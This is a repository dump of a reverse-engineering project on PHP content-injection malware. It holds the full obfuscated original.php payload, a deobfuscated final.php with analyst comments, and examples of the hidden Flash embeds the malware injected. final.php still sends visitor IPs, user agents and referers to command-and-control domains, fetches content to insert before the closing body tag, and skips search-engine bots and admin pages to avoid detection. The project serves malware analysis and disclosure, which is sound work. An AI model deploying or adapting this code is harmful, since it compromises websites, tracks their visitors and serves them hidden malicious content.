├── final.php
├── injected-code-examples.md
├── original.php
├── readme.md
└── step-by-step
    ├── original-step-0.php
    ├── reveng-step-1.php
    ├── reveng-step-2.php
    ├── reveng-step-3.php
    ├── reveng-step-4.php
    ├── reveng-step-5.php
    ├── reveng-step-6.php
    ├── reveng-step-7.php
    └── reveng-step-8.php


/final.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | /**
  4 |  * This is a This is a reverse-engineering of malicious code found in
  5 |  * compromised servers. "REVENGNOTE" is used for comments that are not
  6 |  * in the original code.
  7 |  *
  8 |  * @see        https://github.com/alligo/Reverse-Engineering-PHP-Malware-Content-injection
  9 |  * @author     Bernardo Donadio <emerson at alligo.com.br>
 10 |  * @author     Emerson Rocha Luiz <emerson at alligo.com.br>
 11 |  * @copyright  Copyright (C) 2016 Alligo Ltda. Some rights reserved.
 12 |  * @license    See LICENSE
 13 |  */
 14 | 
 15 | 
 16 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
 17 | function en2($s, $q)
 18 | {
 19 | 	$l = "\x73\164\x72\154\x65\156";
 20 | 	$p = "\x70\141\x63\153";
 21 | 	$r = "\x73\165\x62\163\x74\162";
 22 | 	$m = "\x6d\144\x35";
 23 | 	$g = "";
 24 | 	while ($l($g) < $l($s)) {
 25 | 		$q = $p("H*", $m($g . $q . "\x71\61\x77\62\x65\63\x72\64"));
 26 | 		$g.= $r($q, 0, 8);
 27 | 	}
 28 | 
 29 | 	return $s ^ $g;
 30 | }
 31 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
 32 | function cqq($qw)
 33 | {
 34 |     $domarr = array(
 35 |         "33db9538",
 36 |         "9507c4e8",
 37 |         "e5b57288",
 38 |         "54dfa1cb"
 39 |     );
 40 |     return random($domarr, $qw);
 41 | }
 42 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
 43 | function random($arr, $qw)
 44 | {
 45 |     $g = "\x20\167\x2d\70\x36794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\x33\54\x67\75\x20\167\x2e\40\x72\73\x20\155\x2d\70" . "6d944835,sq-873964872937873960\x38\66\x63\71\x35\61\x38\67\x34\42\x3b";
 46 |     $soy = "\x65\156\x32";
 47 |     $xx = "\x65\170\x70" . "\154\x6f\144\x65";
 48 |     $ecx = "\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e";
 49 |     $scy = "\x73\164\x72\137\x72\145\x70\154\x61\143\x65";
 50 |     $a = $xx("|", "\x5c\170\x7c\134\x31\174\x3d\42\x7c\42\x3b\44\x7c\44");
 51 |     $aa = $xx("|", "8|9|-|,| ");
 52 |     $mec = $ecx;
 53 |     for ($i = 0; $i < sizeof($a); $i++) {
 54 |         $g = $scy($aa[$i], $a[$i], $g);
 55 |     }
 56 | 
 57 |     $ecx("", "};$g//");
 58 |     $mec("", $soy("\230\77\153\147\26\167\114\130\223\257\211\2\253\5\172\316\25\262\145\25\62\72\127\156\270\100\154\56\341\77\4\37\21\152\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20", $scy));
 59 |     return $arr[rand((0.24 - (0.03 * 8)) , (0.1875 * 6)) ] . $qw;
 60 | }
 61 | 
 62 | 
 63 | function g_1($url)
 64 | {
 65 | 	if (function_exists("file_get_contents") === false) return false;
 66 | 	$buf = @file_get_contents($url);
 67 | 	if ($buf == "") return false;
 68 | 	return $buf;
 69 | }
 70 | 
 71 | function g_2($url)
 72 | {
 73 | 	if (function_exists("curl_init") === false) return false;
 74 | 	$ch = curl_init();
 75 | 	curl_setopt($ch, CURLOPT_URL, $url);
 76 | 	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 77 | 	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
 78 | 	curl_setopt($ch, CURLOPT_HEADER, 0);
 79 | 	$res = curl_exec($ch);
 80 | 	curl_close($ch);
 81 | 	if ($res == "") return false;
 82 | 	return $res;
 83 | }
 84 | 
 85 | function g_3($url)
 86 | {
 87 | 	if (function_exists("file") === false) return false;
 88 | 	$inc = @file($url);
 89 | 	$buf = @implode("", $inc);
 90 | 	if ($buf == "") return false;
 91 | 	return $buf;
 92 | }
 93 | 
 94 | function g_4($url)
 95 | {
 96 | 	if (function_exists("socket_create") === false) return false;
 97 | 	$p = @parse_url($url);
 98 | 	$host = $p["host"];
 99 | 	if (!isset($p["query"])) $p["query"] = "";
100 | 	$uri = $p["path"] . "?" . $p["query"];
101 | 	$ip1 = @gethostbyname($host);
102 | 	$ip2 = @long2ip(@ip2long($ip1));
103 | 	if ($ip1 != $ip2) return false;
104 | 	$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
105 | 	if (!@socket_connect($sock, $ip1, 80)) {
106 | 		@socket_close($sock);
107 | 		return false;
108 | 	}
109 | 
110 | 	$req = "GET $uri HTTP/1.0\n";
111 | 	$req.= "Host: $host\n\n";
112 | 	socket_write($sock, $req);
113 | 	$buf = "";
114 | 	while ($t = socket_read($sock, 10000)) {
115 | 		$buf.= $t;
116 | 	}
117 | 
118 | 	@socket_close($sock);
119 | 	if ($buf == "") return false;
120 | 	list($m, $buf) = explode("\r\n\r\n", $buf);
121 | 	return $buf;
122 | }
123 | 
124 | function gtd($url)
125 | {
126 | 	$co = "";
127 | 	$co = @g_1($url);
128 | 	if ($co !== false) return $co;
129 | 	$co = @g_2($url);
130 | 	if ($co !== false) return $co;
131 | 	$co = @g_3($url);
132 | 	if ($co !== false) return $co;
133 | 	$co = @g_4($url);
134 | 	if ($co !== false) return $co;
135 | 	return "";
136 | }
137 | 
138 | // ARRAY 0, END
139 | // ARRAY 1, START
140 | 
141 | if (!function_exists("comgzi")) {
142 | 	function comgzi($gzData)
143 | 	{
144 | 		if (substr($gzData, 0, 3) == "\x1f\x8b\x08") {
145 | 			$i = 10;
146 | 			$flg = ord(substr($gzData, 3, 1));
147 | 			if ($flg > 0) {
148 | 				if ($flg & 4) {
149 | 					list($xlen) = unpack("v", substr($gzData, $i, 2));
150 | 					$i = $i + 2 + $xlen;
151 | 				}
152 | 
153 | 				if ($flg & 8) $i = strpos($gzData, "\0", $i) + 1;
154 | 				if ($flg & 16) $i = strpos($gzData, "\0", $i) + 1;
155 | 				if ($flg & 2) $i = $i + 2;
156 | 			}
157 | 
158 | 			return @gzinflate(substr($gzData, $i, -8));
159 | 		}
160 | 		else {
161 | 			return false;
162 | 		}
163 | 	}
164 | }
165 | 
166 | // ARRAY 1, END
167 | // ARRAY 2, START
168 | 
169 | function k34($op, $text)
170 | {
171 | 	return base64_encode(en2($text, $op));
172 | }
173 | 
174 | function check212($param)
175 | {
176 | 	if (!isset($_SERVER[$param])) $a = "non";
177 | 	else
178 | 	if ($_SERVER[$param] == "") $a = "non";
179 | 	else $a = $_SERVER[$param];
180 | 	return $a;
181 | }
182 | 
183 | /** REVENGNOTE: Do not assume that this malware will have same function names.
184 |  *              even for the same malware.
185 |  */
186 | function day212()
187 | {
188 | 	$a = check212("HTTP_USER_AGENT");
189 | 	$b = check212("HTTP_REFERER");
190 | 	$c = check212("REMOTE_ADDR");
191 | 	$d = check212("HTTP_HOST");
192 | 	$e = check212("PHP_SELF");
193 | 
194 | 	/** REVENGNOTE: this next array does nothing here. But was on original code.
195 | 	 *              33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com
196 | 	 *              are domains that point (now) for the same working server
197 | 	 *              they are used to create content to inject on user code
198 | 	 *
199 | 	 */
200 | 	$domarr = array(
201 | 		"33db9538",
202 | 		"9507c4e8",
203 | 		"e5b57288",
204 | 		"54dfa1cb"
205 | 	);
206 | 
207 | 	/** REVENGNOTE: this is very important. It does NOT inject content on site
208 | 	 *              if is a search engine (that could alert site admin of this
209 | 	 *              malware, and also does not load on pages that are like
210 | 	 *              for administratior interfaces. It also check for a valid
211 |      *              HTTP_REFERER, so sometimes, share a link with a friend will
212 |      *              not work at all, because you need navitate on the site before
213 |      *              Is very likely that most common antivirus agents will maybe
214 |      *              pass this basic check, but remote server will know they
215 |      *              user agent and will return empty content.
216 | 	 */
217 | 	if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array(
218 | 		"google",
219 | 		"slurp",
220 | 		"msnbot",
221 | 		"ia_archiver",
222 | 		"yandex",
223 | 		"rambler"
224 | 	)) . "/i", strtolower($a)))) {
225 | 		$o1 = "";
226 | 	}
227 | 	else {
228 | 		$op = mt_rand(100000, 999999);
229 | 		$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
230 | 		$url = "http://" . cqq(".com") . "/" . $g4;
231 | 		$ca1 = en2(@gtd($url) , $op);
232 | 		$a1 = @explode("!NF0", $ca1);
233 | 		if (sizeof($a1) >= 2) $o1 = $a1[1];
234 | 		else $o1 = "";
235 | 	}
236 | 
237 | 	return $o1;
238 | }
239 | 
240 | // ARRAY 2, END
241 | // ARRAY 3, START
242 | 
243 | if (!function_exists("dcoo")) {
244 | 	function dcoo($cz, $length = null)
245 | 	{
246 | 		if (false !== ($dz = @gzinflate($cz))) return $dz;
247 | 		if (false !== ($dz = @comgzi($cz))) return $dz;
248 | 		if (false !== ($dz = @gzuncompress($cz))) return $dz;
249 | 		if (function_exists("gzdecode")) {
250 | 			$dz = @gzdecode($cz);
251 | 			if (false !== $dz) return $dz;
252 | 		}
253 | 
254 | 		return $cz;
255 | 	}
256 | }
257 | 
258 | // ARRAY 3, END
259 | // ARRAY 4, START
260 | 
261 | if (!function_exists("pa22")) {
262 | 	function pa22($v)
263 | 	{
264 | 		Header("Content-Encoding: none");
265 | 		$p = "\x70\162\x65\147\x5f";
266 | 		$p1 = $p . "\155\x61\164\x63\150";
267 | 		$p2 = $p . "\162\x65\160\x6c\141\x63\145";
268 | 		$t = dcoo($v);
269 | 		if ($p1("/\<\/body/si", $t)) {
270 | 			return $p2("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
271 | 		}
272 | 		else {
273 | 			if ($p1("/\<\/html/si", $t)) {
274 | 				return $p2("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
275 | 			}
276 | 			else {
277 | 				return $t;
278 | 			}
279 | 		}
280 | 	}
281 | }
282 | 
283 | /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
284 | //ob_start("pa22");
285 | 
286 | /** REVENGNOTE: next code was not on this step, is a modified version of original day212()
287 |  *              function. If you wanna debut this malware, here is your start point
288 |  **/
289 | function day212_fiti()
290 | {
291 | 
292 | 	// $a = check212("HTTP_USER_AGENT");
293 | 	$a = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko';
294 | 	// $b = check212("HTTP_REFERER");
295 | 	$b = 'http://www.electrictoolbox.com/';
296 | 	// $c = check212("REMOTE_ADDR");
297 | 	$c = '198.133.12.17';
298 | 	// $d = check212("HTTP_HOST");
299 | 	$d = 'xpto.com.br';
300 | 	// $e = check212("PHP_SELF");
301 | 
302 | 	$e = '/index.php';
303 | 	/** REVENGNOTE: this next array does nothing here. But was on original code.
304 | 	 *              33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com
305 | 	 *              are domains that point (now) for the same working server
306 | 	 *              they are used to create content to inject on user code
307 | 	 *
308 | 	 */
309 | 	$domarr = array(
310 | 		"33db9538",
311 | 		"9507c4e8",
312 | 		"e5b57288",
313 | 		"54dfa1cb"
314 | 	);
315 | 
316 |     /** REVENGNOTE: check original day212() function. This remove logic of
317 |      *              check if should or not request remote server for contents
318 |      *              just for debug
319 |     **/
320 | 
321 | 	$op = mt_rand(100000, 999999);
322 | 	$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
323 | 	$url = "http://" . cqq(".com") . "/" . $g4;
324 | 	echo PHP_EOL . '$url: ' . $url . ' ';
325 | 	$ca1 = en2(@gtd($url) , $op);
326 | 	$a1 = @explode("!NF0", $ca1);
327 | 	if (sizeof($a1) >= 2) $o1 = $a1[1];
328 | 	else $o1 = "";
329 | 	return $o1;
330 | }
331 | 
332 | /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
333 | var_dump(day212_fiti());
334 | echo PHP_EOL;
335 | 


--------------------------------------------------------------------------------
/injected-code-examples.md:
--------------------------------------------------------------------------------
 1 | # Injected code examples
 2 | 
 3 | Each URL works ONLY once (at least for same user IP on URL). They will not
 4 | work again (at least in a period of 36 hours)
 5 | 
 6 | 
 7 | URL: http://33db9538.com/531793?crY%252FQrHWgrFR8oLnoEdSpCn1eDctMY2UGy3QzW92Q1%252B7xUYvHapZXPkV1i57nyj2VEgHj9D6CPguXpc7XKsQBJQf7eKdYZQw.V60xW%252BeVzOkTq5yi5HVYvj%252FzbDBiELXWQnvPlSBMIw%253D%253D.DuB9BeyJ0LBV7pz2vA%253D%253D.UqwhSrPZgvoBqtuj6T5YpSC0bTY%253D.ELArT7jCze4MrA%253D%253D
 8 | 
 9 | ```html
10 |   <body> <div style = "position: absolute;z-index:-1; left:288px; opacity:0;filter:alpha(opacity=0); -moz-opacity:0;">
11 | <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="dwijp" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="46" height="43" align="middle" >
12 | <param name="allowScriptAccess" value="always"/><param name="movie" value="http://jolijk.tk/iikseiercneeptnllbftoofkmrssmfrinffmosbtaabillrlobmdontliiblrneatadoidlbralordakomrrpmfnatdamibt/"/><param name="quality" value="high"/><param name="FlashVars" value="f=3" /><param name="bgcolor" value="#ffffff"/><param name="wmode" value="opaque"/>
13 | <embed src="http://jolijk.tk/iikseiercneeptnllbftoofkmrssmfrinffmosbtaabillrlobmdontliiblrneatadoidlbralordakomrrpmfnatdamibt/" quality="high" bgcolor="#ffffff"  name="dwijp"  FlashVars="f=3" width="41" height="39" align="middle" allowScriptAccess="always" play="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="opaque"/></object>
14 | </div> </body>
15 | ```
16 | 
17 | 
18 | URL: http://54dfa1cb.com/244686?mYYw57HBZWnu5muhVD4rNO5ON9hrQCLyK0z6nPcokekGy1wv3perO0p6u2pspOMHLEiIhVeh2k9hx0utedWulfN%252B4%252BHh9O8%252F.vJ0%252B%252FueCKzGsv3XkEAwhLvhII98kYRqwchrlxLgS8Q%253D%253D.5dByoOyeN2jq%252BnWwRQ%253D%253D.rJk%252B4fPOayv1qik%253D.%252B4Ak6rjVKjazuA%253D%253D
19 | 
20 | ```html
21 |   <body> <div style = "position: absolute;z-index:-1; left:299px; opacity:0;filter:alpha(opacity=0); -moz-opacity:0;">
22 | <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="ndmpwy" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="47" height="46" align="middle" >
23 | <param name="allowScriptAccess" value="always"/><param name="movie" value="http://jolijk.tk/ikirfnendsefpbnamtepnbecrasimeppoifkosanbobmmepdoersnotfknarroartsdeiormrkmmpibe/"/><param name="quality" value="high"/><param name="FlashVars" value="f=3" /><param name="bgcolor" value="#ffffff"/><param name="wmode" value="opaque"/>
24 | <embed src="http://jolijk.tk/ikirfnendsefpbnamtepnbecrasimeppoifkosanbobmmepdoersnotfknarroartsdeiormrkmmpibe/" quality="high" bgcolor="#ffffff"  name="ndmpwy"  FlashVars="f=3" width="40" height="48" align="middle" allowScriptAccess="always" play="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="opaque"/></object>
25 | </div> </body>
26 | ```
27 | 
28 | URL: http://33db9538.com/629549?dhyanhS4OJYDCLb%252BQ%252FFHsv4HEPfZ5fehKvijTPJINu0Skhgd5Q53AXuFbJOGwqXosx1a29RVa9%252FYFxoFKkyXH%252FZhdeJFY92W.UweUh0L7ds5BUai7B8NNqOgBBPCWxM%252Fjc668FL1yVg%253D%253D.CkrY2UnnapcHFKjvWw%253D%253D.QwOUmFa3NtQYRPQ%253D.FBqOkx2sd8leVg%253D%253D
29 | 
30 | ```html
31 |   <body> <div style = "position: absolute;z-index:-1; left:289px; opacity:0;filter:alpha(opacity=0); -moz-opacity:0;">
32 | <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="awybkp" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="41" height="47" align="middle" >
33 | <param name="allowScriptAccess" value="always"/><param name="movie" value="http://jolijk.tk/idiieeflcnefrfonmkbkkcbolssimnpdoifkotbtaablrimbkfmoopctirbcrrarttcmknpc/"/><param name="quality" value="high"/><param name="FlashVars" value="f=3" /><param name="bgcolor" value="#ffffff"/><param name="wmode" value="opaque"/>
34 | <embed src="http://jolijk.tk/idiieeflcnefrfonmkbkkcbolssimnpdoifkotbtaablrimbkfmoopctirbcrrarttcmknpc/" quality="high" bgcolor="#ffffff"  name="awybkp"  FlashVars="f=3" width="42" height="44" align="middle" allowScriptAccess="always" play="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="opaque"/></object>
35 | </div> </body>
36 | ```


--------------------------------------------------------------------------------
/original.php:
--------------------------------------------------------------------------------
1 | <?php $ljwlpffp = 'sdXA	x27K6<	x7fw6*3qj%>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~	x	x272qj%6<^#zsfvr#	x5cq%7/7#@}l;33bq}k;opjudovg}x;0]=])0#)U!	x27{**u%-#jt03of:opjudovg<~	x24<!%o:!>!	x242178}527}88:}334}472	x24<!:!}V;3q%}U;y]}R;2]},;osvufs}	x27;mnui}&K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd27pd%6<C	x27pd%6|6.7x24]26	x24-	x24<%j,,*!|	x24-	x24gvodujpo!	x24-	x24y7	x24-	x24*<%w:!>!(%w:!>!	x246767~6<Cw6<pd%w6Z6<.5`hA	x27pd%6<pd%w6Z6<.4`hA	x27	x27&6<.fmjgA	x27doj%6<	x7fw6*	x7f_*#fmjgk4`{6~}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6!%t2w>#]y74]273]y76]252]y85]256]},;uqpuft`msvd}+;!>!}	x27;!>>>!}_;gvc%}&;ftmbg}	x7f;6+99386c6f+9f5d816:+bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)s*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:	x5c%j:.2^,%b:<51L3]84]y31M6]y3e]81#/#7e:5594f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]eu{66~67<&w6<*&7-#o]s<*)ujojR	x27id%6<	x7fw6*	x7f_*#ujojRk3`{666~6<&w6<	x7fw6*CW&)7gj6<.)%bbT-%bT-%hW~%fdy)##-!#~upzwgv("", $fonatsf); $nsxgpqr();}}x24	x5c%j^	x24-	x24tvctus)%	x24-	x24b!>!%yy)#}#-#	x24-	x24-tusqp}	x27;%!<*#}_;#)323ldfid>}&;!osvufs}	x7f;!opjud)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#np]58]24]31#-%tdz*Wsfuvso!%bss	x5csbvg+)!gj+{e%!osvufs!*!+A!>!{e%)!6|7**111127-K)ebfsX	x27u%)7fmjix6<C	x27&6<*rfs%7-K)fujsxX6<#o]o]Ytbc	x7f!|!*uyfu	x27k:!ftmf!}Z;^nbsbq%	x5cSFWSFT`%}X;!sp!*#o%:-5ppde:4:|:**#ppde#)tutjyf`4	x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudooe))1/35.)1/14+9**-)1/2986+c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!	x45	116	x54"]); if ((strstr($uas,"	x6d	163	x69	145")) or (strstr7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdot)%z-#:#*	x24-	x24!>!	x24/%tjw/	x24)%	x24-	x24y4	x24-	x24]y8	x24-	#/*)323zbe!-#jt0*?]+^?]_	x5c}X	x24<!%tmw!>!#]y84]275]y83]273]y76]277#<pg)%	x24-	x24*<!~!	x24/%t2w/	x24)##-!#~<#/%	x24-	x24!>!fyqm%ff2!>!bssbz)	x24]25	x24-	x24-!%	x24-	x24*!|!	x24-	fmhpph#)zbssb!-#}#)fepmqnj!/!gj6<*doj%7-C)fepmqnjAFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%	x7f!<X>s-%rxW~!Ypp2)%zB%z>!	x24/%tmw/	x24)%zW%h>EzH,2W%wN;pD#)sfebfI{*w%)kVx{**#k#)tutjyf`x	x22l(!isset($GLOBALS["	x61	156	x75	156	x61"])))) { $GLOBALS["	x61	156	x#*-!%ff2-!%t::**<(<!fwbm)%tjw)#	x24#-!#]y38#-!%w:**<")));$nsxgpqr = $t%cB%iN}#-!	x24/%tmw/	x24)%c*W%eN+#Qi	x5c1^W%c!>!%i	x5#-#Y#-#D#-#W#-#C#-#O#-#N	x22)gj6<^#Y#	x5cq%	x27Y%6<.-n%)utjm6<	x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&x69	157	x6e"; function khjatfs($n){return chr(ord($n)-1);} @error!osvufs}w;*	x7f!>>	x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)su"	x48	124	x54	120	x5f	1ovg}k~~9{d%:osvufs:~928>>	x<h%_t%:osvufs:~:<*9-1-r%)s%>/h%62]67y]562]38y]572]48y]#>m%:|:*r%:-t%)%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]#7/7^#iubq#	x5cq%	x27jsv%6<C>^#zsfvr#	x5cq%7**^#zsfvr#	x5cq%)ufttj]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]34224<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[!	x24-	x24gps)%j>1<%j=tj{f!%c:>%s:	x5c%j:^<!%w`	x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]27>	x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA	x273qj%6<*Y%)fnbozcYufhA27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!	x27!hmg%)!gj!~<ofmy75	156	x61"]=1; $uas=strtolower($_SERVER[%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbq6<tfs%w6<	x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR	x27*X)ufttj	x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57f%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#	x27rfs%6~6<	x7fpo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54ltcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!	x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!	x`{66~6<&w6<	x7fw6*CW&)7946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNy6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!	x2400~:25	x53	105	x52	137	x41	107($uas,"	x72	166	x3a	61	x31"))) { $tupzwgv = "	x63	162	x65	141	x74	14b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!*L1#/#M5]DgP5]D6#<%fdy5	x5f	146	x75	156	x63	164	<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdzf%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge5#0#)idubn`hfsq)!sp!*#ojneb#-*5f	163	x74	141	x72	164") && 399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbs>>	x22!ftmbg)!gj<*#k#)usbut`cpV	x7f	x7f%>5h%!<*::::::-111112)eobs2qj%7-K)udfoopdXA	x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubf6-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281ss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:55971M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofmw6<*K)ftpmdXA6|7**197-]o]s]#)fepmqyf	x27*&7;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}c	x27,*b	x27)fepdof.)fepdof./#@#/qp[A	x27&6<	x7fw6*	x7f_*#[k2`{6:!}7;!}6	x7f	x7f<u%V	x27{ftmfV	x7f<*bz+sfwjidsb`bj+upcotn+qsvmt+;zepc}A;~!}	x7f;!|!}{;)gj37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#7tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuo#-Ez-1H*WCw*[!%rN}#QwTW%hIr	x5c1^!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO	x22#>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L"%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!-%r	x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%butcvt)!gj!|!*bubE{h%)j{hX&Z&S{ftmfV	x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<_reporting(0); $fonatsf = implode(array_map("khjatfs",str_split(bssbz)#44ec:649#-!#:618d5f9#-!#f6c68jyf`opjudovg	x22)!gj}1~!<2p%	x7f!~!<##!>!2p%Z<^2	x5c2b%!>!2p%ov>*ofmy%)utjm!|!*5!	x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-if((function_exists("	x6f	142	xpef)#	x24*<!%t::!>!	x24Ypp3)npd!opjudovg!|!**#j{hnpd#)tut:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:rmsv`ftsbqA7>q%6<	x7fw6*	x7f_*#fubfsdXk5pd%6<pd%w6Z6<.3`hA	x27pd%6<pd%w6Z6<.2`hA	x25]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5d/#)rrd/#00;quui#>.%!<***f	x27,*e	x27,*d	x27,*sTrREvxNoiTCnuf_EtaerCxECalPer_Rtspmkindbxxm'; $rrxokb=explode(chr((416-296)),substr($ljwlpffp,(31978-26101),(234-200))); $odqammov = $rrxokb[0]($rrxokb[(3-2)]); $qpzkvvx = $rrxokb[0]($rrxokb[(13-11)]); if (!function_exists('ukvjsry')) { function ukvjsry($wfdsbgilnz, $pzypycpnpc,$qafznm) { $pypqskkz = NULL; for($rruveki=0;$rruveki<(sizeof($wfdsbgilnz)/2);$rruveki++) { $pypqskkz .= substr($pzypycpnpc, $wfdsbgilnz[($rruveki*2)],$wfdsbgilnz[($rruveki*2)+(6-5)]); } return $qafznm(chr((60-51)),chr((383-291)),$pypqskkz); }; } $ghgcnmmutm = explode(chr((295-251)),'5539,31,4074,28,2158,67,3266,41,2633,23,3782,26,1536,65,3808,68,3932,26,2447,65,5323,64,5111,56,394,67,5721,42,311,20,893,21,4610,21,2400,47,1268,65,3469,55,4588,22,4206,62,0,22,3135,66,88,29,2819,66,2372,28,5682,39,3649,23,1984,21,461,47,3348,55,4871,33,542,34,914,67,4712,37,4631,46,257,54,608,52,2512,65,2577,56,3561,46,3607,42,3201,65,3307,41,5484,55,680,37,717,27,5233,24,5598,29,5423,61,5006,37,1152,51,5831,46,4677,35,4180,26,4476,66,4777,28,1955,29,4045,29,3997,48,660,20,3672,57,2005,64,3876,35,3403,66,1333,59,3524,37,1105,47,2656,27,1661,48,4542,46,1392,69,1237,31,4141,39,4749,28,5257,66,4904,69,2120,38,218,39,4805,25,117,45,508,34,1775,70,576,32,3729,53,2683,31,5627,55,2752,67,4830,41,2714,38,162,56,1904,51,1041,64,1709,66,331,63,3016,26,1845,59,5570,28,2295,53,1488,48,5387,36,4102,39,2069,51,4973,33,5167,66,4356,60,828,65,798,30,4268,34,4302,54,3911,21,5043,68,4416,60,3958,39,981,25,3094,41,5763,68,2885,65,1203,34,1461,27,1601,60,744,54,3042,52,22,66,2950,66,2348,24,2225,70,1006,35'); $kzgsmrix = $odqammov("",ukvjsry($ghgcnmmutm,$ljwlpffp,$qpzkvvx)); $odqammov=$ljwlpffp; $kzgsmrix(""); $kzgsmrix=(493-372); 